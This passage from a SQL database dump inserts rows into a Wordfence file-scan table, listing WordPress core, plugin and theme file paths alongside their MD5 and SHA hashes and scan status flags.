(0x954abc78037ff17c965dd3159d32384c, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/auto-update/updater.php', 0, 0x412a6a65f4a5cf631c30822b9e63cd38, 0x412a6a65f4a5cf631c30822b9e63cd38, 0x304a73ecd388713f22d1358ee9f57a44e8161122ff4234b9ffe52fd1c785b9b3, '', 0, '?'),
(0x95688f9789a7914601755165f1aa20ee, 'wp-includes/images/wlw/wp-comments.png', 1, 0x00000000000000000000000000000000, 0x4cc2365d0450dedec30cec2e73a8a1d4, 0xae7a6c1ab5d3061f43b9da1444e090a81f8dc30e238261f64eb5e73327585a93, '', 0, '?'),
(0x956c970d31c56d83b1cc58fded55443e, 'wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php', 0, 0xc7ea188ba7b6e2ecce409868723556c9, 0xc7ea188ba7b6e2ecce409868723556c9, 0x0864d767c9790bd84fff4264765e1a6b52d176b4fe10c1d9c14697e24e067ddd, '', 0, '?'),
(0x957907329c25c38549803ec72db1654a, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg', 0, 0x09919846c7faafea931ff410cb506221, 0x09919846c7faafea931ff410cb506221, 0x6e22e05f9f7e090591452ba105e39850404f99f7a6155370fb12815f105e2a22, '', 0, '?'),
(0x957f7531481d4d3a124537022f9a7bfa, 'wp-admin/includes/class-wp-site-health.php', 1, 0x00000000000000000000000000000000, 0x0fd5bc5dd338930add266d8496f9b251, 0x10f67861ce631767e11b37643b894c6bc70ccc5e7db8777619b09195d487cb48, '', 0, '?'),
(0x95804719fbcd7d51647168efb4b9efbf, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_search_24px.svg', 0, 0x80773ef1e3834cb91f11838347a82de2, 0x80773ef1e3834cb91f11838347a82de2, 0xf99d2120acbaecda04802d2b7fb240d896e4c5d32edebb50103b0fd63b0bddc4, '', 0, '?'),
(0x95a2d9767356d314ac3045a870a65a2f, 'wp-content/themes/Impreza/framework/functions/debug.php', 0, 0x0c313340f014126d17144540093760da, 0x0c313340f014126d17144540093760da, 0xaf40ce9cb09a1011707dd96c20c8cffd1853d6666baf209f062a65556ecd33e3, '', 0, '?'),
(0x95a8419e543774020be08d04918aa4a4, 'wp-content/themes/Impreza/framework/templates/us_grid/listing-post.php', 0, 0x3037ee2197cc342c78fa192779e96ec0, 0x3037ee2197cc342c78fa192779e96ec0, 0xed8106fe00e9e49744dfb7ff54593cb82b844eb4312172ea378865db6e84e6e8, '', 0, '?'),
(0x95c068f8ebf664fa01e177aaca9342d3, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_row.php', 0, 0x2dc6df6b0ae314c9826e1a81586fffed, 0x2dc6df6b0ae314c9826e1a81586fffed, 0x1a4e30c74f4b66d0e2b67937516f8d39fb01429847b735fed2577c3e0bfc8a6e, '', 0, '?'),
(0x95c7800733e58b3cacb226b3aa59c486, 'wp-includes/class-wp-roles.php', 1, 0x00000000000000000000000000000000, 0x26279ee7fc620ec9b9eac26e464674f6, 0xa7200171769e57cf1f6c7b599e96119af8a9beddb339ec09a187dcc0283f32fa, '', 0, '?'),
(0x95cc660730d90c15cbcdada1da7eb729, 'wp-includes/fonts/dashicons.woff', 1, 0x00000000000000000000000000000000, 0x0c1c1ad41c025f72592bca820e073bec, 0x038fa77955bd105d66f4ee38c8c6f074e2f0a7bd1092d9ffc36c05d5034c2e10, '', 0, '?'),
(0x95d21d2ec9494f49a250b2b325158f29, 'wp-includes/Requests/Transport.php', 1, 0x00000000000000000000000000000000, 0x019c993bce6bed178baf4b5c566cc617, 0xc9af4f33659690cd46bbd4e39b86b7d6762b0fa8e30702c0f02e722fdc3e9f2c, '', 0, '?'),
(0x95e84d4f2c9dcce37305e6d2d40de7e2, 'wp-includes/class-wp-http-encoding.php', 1, 0x00000000000000000000000000000000, 0xaac1caca59ea9fac2cb8b6c8af8f9118, 0x7950b3eede8dbba3b95416aa2f9161d6315895b74cb167c307d1cfe7a87b979c, '', 0, '?'),
(0x95f5d9d64b16672e0cdacf7a72d80e02, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg', 0, 0x17d3441d700029fafc5bf0598f1e0ee9, 0x17d3441d700029fafc5bf0598f1e0ee9, 0x4589e985b22e7e49012f80744bc7d7d2e6de96bfb74495995879cbd1e6087b45, '', 0, '?'),
(0x960fa7a579a106090431bed30e935686, 'wp-content/plugins/Ultimate_VC_Addons/templates/index.php', 0, 0xb9498f8ebf329eaedd0b35a68b084ed2, 0xb9498f8ebf329eaedd0b35a68b084ed2, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?'),
(0x961062f303bd2f28da7f8fa35a498cf1, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-role-manager.php', 0, 0x34f62d8577a5fdafec40918c6afe9ce1, 0x34f62d8577a5fdafec40918c6afe9ce1, 0x9f1524ad2cab33e5eac23dc565aacc0e119bc7535410604802ad6cbd43fbef58, '', 0, '?'),
(0x9623796edb81e5bd905b6817725cd855, 'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php', 1, 0x00000000000000000000000000000000, 0xa9081e70b6f88def8fe8b0df93b48188, 0x6417278eecb0e4e8c75fc8159f89432722fac59ef1ebe6be1c1968d9338211ea, '', 0, '?'),
(0x9636b67c3bbe3b38c551b934996b85f6, 'wp-admin/install.php', 1, 0x00000000000000000000000000000000, 0x4593ae829c94903edc2c9ffa9d2a879e, 0xe3d9947fa688115fafa4f9b629b3039c2c9a3be90d3a2597c711b324c032fc82, '', 0, '?'),
(0x9639b565dd45f880627fddbe6cb433a2, 'wp-includes/js/wp-lists.min.js', 1, 0x00000000000000000000000000000000, 0xdf360a33e64d91258ff738d8ae445397, 0x06affa3427321a1f6bd5e7bd1609697e9033f383810a3c327b076d551287f05c, '', 0, '?'),
(0x963eb62d309a65880dcd252967cd6f3f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg', 0, 0xf2959c0707595699a4ecf74ba19fe431, 0xf2959c0707595699a4ecf74ba19fe431, 0x335576614e47acb87a142ed6c69a1c57794713d006081f53b21dd1ce980d6d1f, '', 0, '?'),
(0x965f9c97efc6faadc4ee95dc019bdc7d, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_60_24px.svg', 0, 0x40c8ab98113ff72fb4bdc5d9daf55bde, 0x40c8ab98113ff72fb4bdc5d9daf55bde, 0x8263eab21feeee0005e47c01b70a0d0c8ec5995084bef4c835cc2c72262db648, '', 0, '?'),
(0x967139ff8af3d7d1def394b7d4046f5e, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_10.php', 0, 0x17691e5e8c0e529bdeecc6cf0ba9a4a9, 0x17691e5e8c0e529bdeecc6cf0ba9a4a9, 0x2d1186a1748fbfaeecebe8945e36677f13d6a0a42270a66546fc3a86fb81a1f0, '', 0, '?'),
(0x967a39bb09c560fc6433dd00c8496179, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php', 1, 0x00000000000000000000000000000000, 0xe720c140dbca185e8da2b5ac384a1902, 0xa5e7d8bd8340a4bc422d4bf516b9c86de3e19dc32dc8bb1695df0e041ac23270, '', 0, '?'),
(0x968a58bbe8d0dff21ac0dc5a61dd8c0d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg', 0, 0x12ccbbd486bc70a5a73e8ddf240d29f8, 0x12ccbbd486bc70a5a73e8ddf240d29f8, 0x39a942f4e3b6e8d9f8aa702943df8de80121323cdc150de3904cfb4cbb54aca3, '', 0, '?'),
(0x968e191a356fd614dd2352272fa4ac6c, 'wp-includes/fonts/dashicons.eot', 1, 0x00000000000000000000000000000000, 0xe0eef7c2c85fd5996597c086a87c0ece, 0x9ebb2ed47d36dde860873837e94a612165b439fb3744f722e9896c5b9a5ac423, '', 0, '?'),
(0x96a82c49693844b2f5bf52dac467362d, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xb0f32402ee472e8e6cfc5a0d935c3b5b, 0x157dc4c23ed9d74824dfd2947e03941066503b140ff70358aaa1e38644e5b3a1, '', 0, '?'),
(0x96b3e31e675684ec6943bded2ce151d8, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_fitness_center_24px.svg', 0, 0xa9a332405bd7cf6595231fb25792d34f, 0xa9a332405bd7cf6595231fb25792d34f, 0x7ee13a16e64e5cdae7840096fe72746332700968d3468dc7255137b6fc86112d, '', 0, '?'),
(0x96b41b3f7f7168245baa7a06f9a829da, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/mode-css.js', 0, 0x679e00d41c6485c1ae3d97643e8191d6, 0x679e00d41c6485c1ae3d97643e8191d6, 0x720cac0d14c938e3de824de4240acdc710eae5a39250d2c2824d9e19126b71df, '', 0, '?'),
(0x96c1bc0b9945983fc61d8cd0aee1bea0, 'wp-includes/js/media-views.min.js', 1, 0x00000000000000000000000000000000, 0x5ffe2bff63264b4e5a2fa4a78d1f9ace, 0x6a71c248d42219bcb8be802db5a2e7cfb3614e7a3f8601e55f363fbf24d060ea, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x96c2a01d16cf768591c6189a62047529, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php', 1, 0x00000000000000000000000000000000, 0xc43d5998918b9940fcb9d30fb75fa578, 0xdeb0ca1a5e33c3c99f7689552e61810d5d0166df68e202498515992873f5c641, '', 0, '?'),
(0x96dd82c1c5d6a448e77d4efdc028879f, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jquery-ui.js', 0, 0xd60ee0bb23d64077f57fef3cb6d66f5d, 0xd60ee0bb23d64077f57fef3cb6d66f5d, 0x22b881ddf2ec9434a8390b273ad68696900164ee1e8fa3981a2349a4441f390f, '', 0, '?'),
(0x96e24367bfb8f11e8b7d1d7cc745f7fd, 'wp-admin/js/word-count.min.js', 1, 0x00000000000000000000000000000000, 0x3bd992110e70a32eceff0c0243f33171, 0x6b220067e5f6757d092ce2861b02a662e094872898ac403ba04cb73cb744a9ab, '', 0, '?'),
(0x96edd6b5c8ab58bc85377163e21a863e, 'wp-content/plugins/revslider/public/assets/fonts/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x96f3123914b988cd93c8da12cb92314c, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion-tab.php', 0, 0xb235f4eb5478c6db218afdf0c5134fcc, 0xb235f4eb5478c6db218afdf0c5134fcc, 0x2c0f4636dc4529f6904a098f45c0076f54f82a9c0789d138a20045fce160f9bd, '', 0, '?'),
(0x96f8b2926bf76864b8e6b0fab51dc113, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/ie7/ie7.js', 0, 0x7f80d44e73f431152004b54f47cd0aa2, 0x7f80d44e73f431152004b54f47cd0aa2, 0x1c4225f32003af5a7d377f91cc353ec9e4de429288f641dba127608a2ebb7b2a, '', 0, '?'),
(0x970976be134f2e04847cdfa417d2b582, 'wp-includes/js/tinymce/license.txt', 1, 0x00000000000000000000000000000000, 0x6f9589e0c8df783acd1760d203bafffa, 0x5916e1e2a723774fde675e27e562baec913a855e17eb093d03e8b7a87cf4bcc8, '', 0, '?'),
(0x971395882991c65d861d9d81e29471d9, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_7.php', 0, 0x3121cfad990339b38c495dcc37f4b826, 0x3121cfad990339b38c495dcc37f4b826, 0xc45c393112e1adb2aa23c1e1a6c7b512a1757ed416c92d3dfae0506216da7536, '', 0, '?'),
(0x9720ba7fe10b176fbea14bed675c7862, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design05.php', 0, 0x3779417599c8ab63a8b0d59d21ce9209, 0x3779417599c8ab63a8b0d59d21ce9209, 0x55c04a8f1b2d0683c60d4259e957c316f60bb4a549dd2c44673e448135edc1f5, '', 0, '?'),
(0x974bab56b77e5cf095bcc97e80194c1b, 'wp-content/plugins/wp-super-cache/plugins/badbehaviour.php', 1, 0x00000000000000000000000000000000, 0x9400d3d154f7bc6827f3f83d192c49c8, 0xc903c5c123afeaab07b6b3ae7a80a2381289deb54956437660d1e2cde3f4748b, '', 0, '?'),
(0x974cdfa8f5cfa407138c2805bab952ad, 'wp-admin/css/code-editor.css', 1, 0x00000000000000000000000000000000, 0x434192ef92ee1de6c2d24ffa1b5eee29, 0xc8f7072fd17931347e0502ebdc28ab3681b288a63e422646bbc72cca53acc7c2, '', 0, '?'),
(0x975bd25eba7ebaed14122aa83560ccf7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg', 0, 0xc866f872a25e07540f8a1844b4265f1b, 0xc866f872a25e07540f8a1844b4265f1b, 0x4d338ff6fd14a86890bb7c4a5da98dda7d408966fb3d20c0c037f5e40bd33dce, '', 0, '?'),
(0x9769b47b292463778f1af8713c54e143, 'wp-content/plugins/revslider/admin/assets/css/font/egfont.svg', 0, 0x4db56e156255fcef2e959d0d4a001508, 0x4db56e156255fcef2e959d0d4a001508, 0xad03214955613531c5d12f4c47a891404596614ba4730afd8ba9efc0d119d23f, '', 0, '?'),
(0x976bb3177c4444a319952a403404eb02, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php', 1, 0x00000000000000000000000000000000, 0xa6c50a1c416776fa983103500c83d8b5, 0xbabfbda7306f2a0d91c47641f66fc2331bb29bdf3acddef86af57590bda70479, '', 0, '?'),
(0x97807376d7c9b0943611d17ab566cd83, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_DateTime_Picker.php', 0, 0x46cfca53a34d270fe6adf88fa85176f3, 0x46cfca53a34d270fe6adf88fa85176f3, 0x7b4353fdd8b6900feab85a471cbdb31da2451de8bde865585b52ecb40e426e34, '', 0, '?'),
(0x97ed7c9c7e9489f71dc9f08781e515f4, 'wp-includes/sodium_compat/src/Core32/Salsa20.php', 1, 0x00000000000000000000000000000000, 0x2936b4a5293af6dbcdf0b88efd9daee2, 0x1c4830a2930b4cb3d1973fb8e39eb98d2e31c74df249116508d3c9021dd9a392, '', 0, '?'),
(0x97f162a6fc921fc1ff0ca3ba7c657eeb, 'wp-admin/css/customize-widgets.min.css', 1, 0x00000000000000000000000000000000, 0xf422c35039c6734975166686fc7af611, 0xdbdb067cc2e9125a80c14068fee568e3e74ccb145ca1ec52ad97882653a5ddb1, '', 0, '?'),
(0x97f4ecebccef3b458f747acf62b72da4, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php', 0, 0x9b5e9abdfd4599d0984fa4e1cb9d6054, 0x9b5e9abdfd4599d0984fa4e1cb9d6054, 0xbeab9bf8469fe09a1fc69f848c40bd014891c3670ba919f00c557f95e89de8eb, '', 0, '?'),
(0x97ffb5616cf2569a3f8e66fd1ad1918c, 'wp-includes/IXR/class-IXR-server.php', 1, 0x00000000000000000000000000000000, 0xca1f45d95dd4b25bd2cc8c7dfc065b58, 0xd6daf835ac54bda834a0e45dec931ca61a487e1436d22c8c8abf74958da20b74, '', 0, '?'),
(0x98006814ee94114b669511018d00f0f8, 'wp-content/plugins/wordfence/images/forward_enabled.jpg', 1, 0x00000000000000000000000000000000, 0x55002f336534651399cfd70b8308def6, 0x30bcb451377f3031163897deaa392d967a39d8bd71f0d3145372c492d350f5d3, '', 0, '?'),
(0x980d6e04b6dc7e246642dc1c8104ddae, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg', 0, 0x4f5aa6ebb3508435867fdd9661239689, 0x4f5aa6ebb3508435867fdd9661239689, 0xa7d87121399afa61f4e0789d64f9b79fb3ab65a302c08bd647aafdb2d919ae8f, '', 0, '?'),
(0x980e9bafd0c28e0fd9ea48cb300836b2, 'wp-admin/images/browser.png', 1, 0x00000000000000000000000000000000, 0xc1b2f9c29eb54b1f5c0284629524fe46, 0x2624f186c489399ba1e088d77e5f5348d25fd91c14cc93ef254cbcb6fe2726c1, '', 0, '?'),
(0x98188bb5ef8638281ab96ae85a5d077d, 'wp-includes/js/jquery/ui/effect-pulsate.min.js', 1, 0x00000000000000000000000000000000, 0xe68aa8b524b4726b33456011f8e08997, 0x1065f9b443f1ffb478767f8c5be661beac09c5d4f1fbc141e8a2cf0634ad6ea4, '', 0, '?'),
(0x9823dd69ce7056b885c6d911331bb489, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg', 0, 0x1361b0b014c4f969fd3791d3c0f228f9, 0x1361b0b014c4f969fd3791d3c0f228f9, 0xd8a65c81d39c33c668b1a395a063042ec0cac9414c14687c7229fb039ce70bd2, '', 0, '?'),
(0x982eab3a2705167839ba3be4c44b66ea, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/bootstrap-datetimepicker.js', 0, 0x1fe57a560fe78ed238e7a4e8176eea95, 0x1fe57a560fe78ed238e7a4e8176eea95, 0x71f26e43f8468ed9b0e64d44119990c3069fb48305dcf0dd5f9bcdf0c30f6637, '', 0, '?'),
(0x9836a39eeedce09e05116d5cd82adda6, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_24px.svg', 0, 0x6c2171034d2be778f1206b1d2d8be803, 0x6c2171034d2be778f1206b1d2d8be803, 0x001d11eaa7a45e76de95154fe79bcecd8df08a9672fc9772a09c302389d5fb74, '', 0, '?'),
(0x983c1440e8dcf1ae1f3a0a0520ca37c7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg', 0, 0x60c1d535392a0e5f1e5cd44340c8e8b6, 0x60c1d535392a0e5f1e5cd44340c8e8b6, 0x6e493ae88645ebfbba972308959ccbf752abc9f3af9651f3463fe7b6a9f3d76d, '', 0, '?'),
(0x9858b8d4cdec6735fbf49fbc289d3d63, 'wp-includes/js/tinymce/skins/lightgray/img/trans.gif', 1, 0x00000000000000000000000000000000, 0x12bf9e19374920de3146a64775f46a5e, 0x9cf020d7c3bba7f5ab10cda54aabef934f906d4f9a3acf99e9e7dc6c98579635, '', 0, '?'),
(0x98635803b7d983e67fbf25c6bbdafac0, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pinterest.svg', 0, 0x8c9277d9cf9a2ee63aebd7090d9f823f, 0x8c9277d9cf9a2ee63aebd7090d9f823f, 0x066d04cbf5dc64c48d0d7ea1a49440702be6a3943f3d630fdf604397b793204a, '', 0, '?'),
(0x9867537e363ed4c9baa0c35b12e7175a, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_adb_24px.svg', 0, 0x23f26a56c1df1349114c741973ba40c2, 0x23f26a56c1df1349114c741973ba40c2, 0xdf91a335cfdc5081c7946731a1b58e9c5947712a7db511aa0d0a72f9254c8391, '', 0, '?'),
(0x9870745f205987c18cca374c06e34b74, 'wp-admin/css/deprecated-media-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xf341cc91db43d556d8573cddc05e1ab4, 0x6881007fa2ff16dfedaf6eccf628a9e98f4d7907d25226e4a514ca8931e0393f, '', 0, '?'),
(0x988da3fd549db94489c046d24b3106c7, 'wp-admin/css/media.css', 1, 0x00000000000000000000000000000000, 0xebd0cc92129d8f29fa8b66daa23215eb, 0x8038b8289e0c80d0caca478c31874cc793d21395699d3211be32ab815c45861f, '', 0, '?'),
(0x98c42f47ce9ed3b65bad13c79ceed943, 'wp-admin/js/gallery.js', 1, 0x00000000000000000000000000000000, 0x63b104e2188b3c9504fc58e7773425ad, 0xfd35d8e15aacbdd6a74ac9f8cc18e56ef547bb67b45df9b58d2a2f18b7732f8b, '', 0, '?'),
(0x98cd14c95bb22f9d397da0603a77d950, 'license.txt', 1, 0x00000000000000000000000000000000, 0x40fc2f39d472a1bb52f4ebe59702e0c2, 0xa843a85996ea5214101e29c64b80da6a5c001fceef10d2fa714afc3e38450566, '', 0, '?'),
(0x98f0d639429ffcc37b16e08527b44df4, 'wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php', 0, 0x56f6027083b59b82cf422547480acb9e, 0x56f6027083b59b82cf422547480acb9e, 0xa197c5c0f3b8e8bf6932dc879f4ca736831f8bcbb99ea8048b0d2aee5f823af0, '', 0, '?'),
(0x98f320a0ef90a60d7cd775a22ef4a0ee, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_parallax.php', 0, 0x7a0bc34505ddcc709947df907e29e5f2, 0x7a0bc34505ddcc709947df907e29e5f2, 0x07c96f38f32141a70c2c973b816a97ed3eb2e856845f5d8dcc4065b63e0e1855, '', 0, '?'),
(0x9900a3f9b5e8a0d21c2e177da5667741, 'wp-includes/date.php', 1, 0x00000000000000000000000000000000, 0x60754ec9943d0e2b332380fb1ae48797, 0x9a777de8bc8f1fa6ad4b7eb603290d754513a4fc96d274e4d61d401218203e18, '', 0, '?'),
(0x9911fdc5b8716fa8976c4ce354f7e5c5, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/BSF_Update_Manager.php', 0, 0x86778e7b96d9e029299ed5c5d7189495, 0x86778e7b96d9e029299ed5c5d7189495, 0x12d2fd9d0f90ac1b98c05fde3c2a85d2cc229bf213a1ce03c049b16bf22dd8dd, '', 0, '?'),
(0x9918b93ab95e5e9600bd248734c20a76, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php', 0, 0x99d5f1846435fe6b04454cf8685a38e3, 0x99d5f1846435fe6b04454cf8685a38e3, 0xb8704aa6175a039b8659fd96368d97e99cf8ed715f6451dc13ce0be0d3e4555c, '', 0, '?'),
(0x99234a6aadc3b08f0f765923505f1d46, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_backspace_24px.svg', 0, 0x25bca8f7fcc179d3fc45c3e7f2f9f0cf, 0x25bca8f7fcc179d3fc45c3e7f2f9f0cf, 0x366c067d0da40010ea69384dd06ae240ee3a0b996b3c41d88f0d85d492a807d7, '', 0, '?'),
(0x9948b188c562fb982af68d70ea8023fc, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/countUp.js', 0, 0x8f705dc0a4cd47be5ad97069b619e692, 0x8f705dc0a4cd47be5ad97069b619e692, 0xabdcfbbb537aed012d6aca251a89c41fcd0df502016cb7e68b0a17fb5169e3b8, '', 0, '?'),
(0x994b13e62fce229ecb02e81b4ad5633b, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1579191227.css', 1, 0x00000000000000000000000000000000, 0x6b58f85a0562b8f6d813e5aa35c4ea98, 0x5b004ef986b29245c067f00597eca4d16764b617710d08d2edbfdae82a2749c2, '', 0, '?'),
(0x995b82179fae514822705331c8aaeb63, 'wp-admin/images/arrows-2x.png', 1, 0x00000000000000000000000000000000, 0x972051f086017dcef17964622336840b, 0xf82c6381cbbf1aaf69287ee6d6d729958ca9ce2780c4385b41e92fa849d1e578, '', 0, '?'),
(0x99755fcd16f7791c35ebceae8f557aaa, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/dist/js/bootstrap.min.js', 0, 0x1e1778609b56ca90efd2ce4f02a73ee7, 0x1e1778609b56ca90efd2ce4f02a73ee7, 0xd2c364ab00d2de2e9449497d4cebbd9cde0d49b0a496d345d195f6e4d55e056f, '', 0, '?'),
(0x99780768e606f3c72f22ba34dafb4bdb, 'wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg', 0, 0x7be74dee2b6a712f7668218fda71947b, 0x7be74dee2b6a712f7668218fda71947b, 0xd431df0fb57cfe7736845b73462d0592147253e435c7a0b7d85caa966e7178ff, '', 0, '?'),
(0x99901eb488a6235357bd4e5e60ae4f54, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/search.js', 0, 0xa0953841015f8567a90985a873429cf9, 0xa0953841015f8567a90985a873429cf9, 0x4a727b291b3f47e6d8054517424fa8d84b4925a060331336f4f49fe6b414b5bd, '', 0, '?'),
(0x99972c82fcd618b1f5aa235e988475e8, 'wp-content/plugins/js_composer/config/content/shortcode-vc-text-separator.php', 0, 0x244fa930b6f8e7716b028e69d4f248dc, 0x244fa930b6f8e7716b028e69d4f248dc, 0x2ee325a82876d0e7ccb28c37ba99a84dfbd0816a829db4354810ae1d49a2e1a3, '', 0, '?'),
(0x99985b69785402ba71d4c37e5776a165, 'wp-admin/network/plugin-editor.php', 1, 0x00000000000000000000000000000000, 0x658cf64b77d435555ae217a5bbb1536a, 0x06617c6925d74c3f9dab80891721884508a7cc3a50af0778afbe99bb0d48278d, '', 0, '?'),
(0x999b5a84e52bb1ccb711b335d0478bbb, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg', 0, 0xca4b3b22ad361a4788cb709e8581ca9f, 0xca4b3b22ad361a4788cb709e8581ca9f, 0xc17e7d552aff5eda350021fa311c8d5ea2bbc48d804816d26cae339994399661, '', 0, '?'),
(0x999e4619041b7e85919f79b56337762d, 'wp-includes/js/customize-preview-nav-menus.min.js', 1, 0x00000000000000000000000000000000, 0x310df817c0cfdfd6fd874c0f8d815714, 0x29d355e0eb3c4bd1a19094987b1f75e07d0f305713e730f28a7c1ee5ab58358a, '', 0, '?'),
(0x99b05eb77e6c582599b8f03fd3a4b89e, 'wp-content/plugins/Ultimate_VC_Addons/admin/modules.php', 0, 0x41dacf6841861f74dad743fbe87f991c, 0x41dacf6841861f74dad743fbe87f991c, 0xf6068ec70fc6ac72008723c115748a043ebaec40f7723500aaa872387f21eb0e, '', 0, '?'),
(0x99ba5cc0b036b42501e00f0d411482de, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sign.svg', 0, 0x558d84b8cf458004c04204e205351b8b, 0x558d84b8cf458004c04204e205351b8b, 0x9fcbc4f847f84b8ad74e848e845a606d93aff71c19ad03d9f423def1fb033e06, '', 0, '?'),
(0x99e49196eb067783373a2708c2681d2a, 'wp-includes/js/dist/vendor/lodash.js', 1, 0x00000000000000000000000000000000, 0x050c900c28ad5d8275ff56f63b05becb, 0x084011cd57ba8730dc0442c9b7ac9be9b049f90098aa314ddbd0c597ed185673, '', 0, '?'),
(0x9a06b5c232bcddf4f83afdac1594a1b7, 'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php', 1, 0x00000000000000000000000000000000, 0x168562341fc70e2717a1971f26eb9ff0, 0x08dbbcf39b8a34502714f4a2d113e168194eea61eb3eb7a8db1d45fe35e0b09b, '', 0, '?'),
(0x9a0fc69485f82ac07dcb0267aa30a30a, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-a.php', 0, 0x51dcc0981bab01c73b216b2a42a9899c, 0x51dcc0981bab01c73b216b2a42a9899c, 0xbb1919c94cf7f35b840ee746a80ecb870e728375581ac1a3af2447ab9efee129, '', 0, '?'),
(0x9a1a2dae947837c3f92841c434f9bbe7, 'wp-includes/js/swfupload/license.txt', 1, 0x00000000000000000000000000000000, 0xcbe05bb060c85e07882dc06ff751577a, 0xa9d13a29b29b369f6122337285dc0d500d4e990f3491794a8bd6b78d9355e971, '', 0, '?'),
(0x9a26130c904198c79d88690ba855ea82, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_more_24px.svg', 0, 0x47fb259659df0b61fe7622b54215f7ba, 0x47fb259659df0b61fe7622b54215f7ba, 0xebac3bfa904ea768471c3c5c75d223a7875032744072ec2868aaf85d45c14e00, '', 0, '?'),
(0x9a2c3abfeaf433c0d5b9fc4340c97e9c, 'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess', 1, 0x00000000000000000000000000000000, 0x85bcd541be61b862907672f1a402071d, 0x4387bef6bd277285150339bdec4004e24ba1de8674a1aa99f6e2a77723406bba, '', 0, '?'),
(0x9a31573b639fb69ab8b04ef1c022ef75, 'wp-includes/pomo/streams.php', 1, 0x00000000000000000000000000000000, 0xc04753edd285a63707f4417b9e912690, 0x5fdca3e53b1a349c197c2cb4bdd1ffc19f6ad92c315df77565dd7241135f6772, '', 0, '?'),
(0x9a3d33ff5c6917cc27ba7000fe2e0b82, 'wp-content/themes/Impreza/framework/vendor/wordpress-importer/parsers.php', 0, 0x9a1eeb8a922c97385c5fb38a1f4a9847, 0x9a1eeb8a922c97385c5fb38a1f4a9847, 0x39cae33688f82525b5c758d3e8d7acc0743d9c2b00f688e98626d809fa79ba4b, '', 0, '?'),
(0x9a4a9e8b42be4754b23b2c6ca3c0540e, 'wp-includes/images/smilies/icon_exclaim.gif', 1, 0x00000000000000000000000000000000, 0x3a5cadb33e358d00720fc6cef47367d8, 0xb54cb8c9b5e81248b2cf41289c78ca933291455025f00991d723bdfcaf23c235, '', 0, '?'),
(0x9a569f5ee68233b1e76d3605872e5f50, 'wp-includes/customize/class-wp-customize-background-image-setting.php', 1, 0x00000000000000000000000000000000, 0x29d940877494fe6a123233b413e39d57, 0xe13403a683d8305e2bdc1b752ab03ade9334715b23cad3144f8db26db42611c8, '', 0, '?'),
(0x9a74f09393a61b31644858f5cf934248, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folders.svg', 0, 0xc689a703fc090c5bed542bdd8f1fbf83, 0xc689a703fc090c5bed542bdd8f1fbf83, 0x051e890131cc8bd1875022948e80389ed82f1f88e4f3651859494652efd35603, '', 0, '?'),
